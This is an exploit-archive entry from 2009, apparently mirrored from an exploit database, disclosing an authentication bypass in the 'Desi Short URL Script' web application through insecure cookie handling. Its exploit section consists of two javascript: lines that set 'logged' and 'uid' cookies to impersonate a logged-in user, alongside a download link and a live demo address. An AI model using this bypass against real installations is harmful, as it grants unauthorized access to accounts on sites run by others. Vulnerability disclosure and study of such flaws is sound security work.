[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln
# Published : 2009-06-10
# Author : N@bilX
# Previous Title : School Data Navigator (page) Local/Remote File Inclusion Vulnerability
# Next Title : MRCGIGUY FreeTicket (CH/SQL) Multiple Remote Vulnerabilities
Desi Short URL Insecure Cookie Handling Vulnerability
Discovered By:N@bilX
Home:ma-exploit.com /m4r0c-s3curity.cc
email:eyx@hotmail.com
Not: jib L3az Wla Khaz [ma]
--------------------
download:http://webscripts.softpedia.com/script/Miscellaneous/Desi-Short-Url-Script-42484.html
exploit:
***
javascript:document.cookie = "logged =1";
javascript:document.cookie = "uid = 13";
-----------------
demo:http://www.desiscripts.com/demo/URL/index.php
# www.Syue.com [2009-06-10]